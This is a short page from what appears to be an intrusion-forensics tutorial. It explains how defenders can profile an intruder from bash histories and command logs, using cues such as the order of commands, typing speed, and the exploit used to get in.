[Click Here] Bash Histories, and System Commands (More Than Meets The Eye) So, we've now taken a brief look at some of the ways one can develop "fields" and "fingerprints" from hacked webpages. But, how can we develop a "fingerprint", or come up with fields if a system machine was hacked, and not simply a webserver? Welcome to the world of rootkits and system commands! I'm not going to go very in-depth here, but I will describe a couple of interesting "fields". Some probably more obvious than others. Who Does What When? Different hackers will do different things when they first enter a system, and they tend to do the same things EVERY TIME. Do they check to see if root is on first? Do they take a quick look at the directory structure? Look at the active system processes? Do they just start off loading everything they see onto a remote system? Not only can the order of commands provide a "field", it can also give insights into the "technical maturity" of the hacker, and even their motives (think about that last one for a minute). Here's a tricky one. How fast is the hacker typing in his commands? Is he fumbling, with long pauses in between? Or is he throwing command after command after command into the system? What exploit was originally used to gain access into the system? Was it an old, well known vulnerability that could be exploited with something from rootshell? Or, was it something new, that could be associated with a particular group or two that's suspected of having developed it, or have access to it (This would require some "intelligence work", I'll admit). Now, you probably won't be so lucky as to simply have a bunch of syslogs laying around after the hacker has left. But, there are other ways that the actions of users on your systems can be, and should be (and on most "important systems" are), logged. These are just a few examples. But, you can see that even though we don't have any "physical evidence" or "visibly unique evidence" we are still able to come up with identifiable fields. Back To The Table Of Contents